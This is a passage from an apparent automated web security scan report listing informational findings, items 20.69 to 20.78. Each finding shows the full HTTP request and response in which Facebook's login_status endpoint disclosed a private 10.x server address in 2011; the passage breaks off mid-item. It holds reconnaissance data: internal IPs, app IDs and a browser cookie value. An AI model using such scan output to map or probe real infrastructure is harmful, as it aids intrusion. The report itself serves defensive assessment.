Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ffe4095ec&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2c97d5318&relation=parent&transport=postmessage&frame=f7bf85e88
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.92.95
X-Cnection: close
Date: Thu, 05 May 2011 01:51:41 GMT
Content-Length: 0


20.69. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.148.108

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d9658e4c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ddf9738%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9162ab08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df354a717f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df249469b68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff26ab733ac%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df30563d68&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f354a717f8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff26ab733ac&relation=parent&transport=postmessage&frame=f30563d68
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.148.108
X-Cnection: close
Date: Thu, 05 May 2011 02:02:37 GMT
Content-Length: 0


20.70. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.83.59

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ec768578%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f516ad28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff5c1a2b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16188477c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20b6aeebc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff33414522%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df109862054&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f16188477c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff33414522&relation=parent&transport=postmessage&frame=f109862054
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.83.59
X-Cnection: close
Date: Thu, 05 May 2011 01:40:23 GMT
Content-Length: 0


20.71. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.191.38

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c71de2bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1aa1cd374%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c5aef88%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25323c354%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23a2a205c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff126b06d1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21bd052&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f25323c354&origin=http%3A%2F%2Faol.sportingnews.com%2Ff126b06d1&relation=parent&transport=postmessage&frame=f21bd052
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.191.38
X-Cnection: close
Date: Thu, 05 May 2011 01:22:17 GMT
Content-Length: 0


20.72. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.171.52

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28ef43e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df119f53988%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df221f991c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e79ca694%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f2f69a18%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff22eb03b04%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd650a0cc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3e79ca694&origin=http%3A%2F%2Faol.sportingnews.com%2Ff22eb03b04&relation=parent&transport=postmessage&frame=fd650a0cc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.171.52
X-Cnection: close
Date: Thu, 05 May 2011 01:23:52 GMT
Content-Length: 0


20.73. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.209.50

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a54b7dd8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df93203eb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c35f89d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f3c0160%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df88c7529%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff19c6b646%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ad5ca5b&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3f3c0160&origin=http%3A%2F%2Faol.sportingnews.com%2Ff19c6b646&relation=parent&transport=postmessage&frame=f3ad5ca5b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.209.50
X-Cnection: close
Date: Thu, 05 May 2011 01:29:11 GMT
Content-Length: 0


20.74. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.52.60.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10c9d7c34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8d8d5e7c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8723fba8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d1666efc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6e3d0dc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2af41353%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df27955bdf4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2d1666efc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2af41353&relation=parent&transport=postmessage&frame=f27955bdf4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.60.49
X-Cnection: close
Date: Thu, 05 May 2011 01:41:45 GMT
Content-Length: 0


20.75. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.205.57

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16d2a7e14%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f63feb74%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df268a5a288%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d9db1fc8%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13573f778%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff30d654d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1357ef214&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1d9db1fc8&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff30d654d68&relation=parent&transport=postmessage&frame=f1357ef214
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.57
X-Cnection: close
Date: Thu, 05 May 2011 01:28:42 GMT
Content-Length: 0


20.76. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.190.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3236ba9d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa5bf6cf%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df73812d74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5a364168%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2807ef474%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f5a364168&origin=http%3A%2F%2Faol.sportingnews.com%2Ff283df9574&relation=parent&transport=postmessage&frame=f1bc6f16a8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.37
X-Cnection: close
Date: Thu, 05 May 2011 01:27:49 GMT
Content-Length: 0


20.77. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.136.54.123

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d8ed7f78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d7359dc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3689dcef%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df301acf0fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25bc9b49%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f301acf0fc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff16c94d68&relation=parent&transport=postmessage&frame=f264d779a4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.54.123
X-Cnection: close
Date: Thu, 05 May 2011 02:08:21 GMT
Content-Length: 0


20.78. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:
  • 10.54.152.34

Request

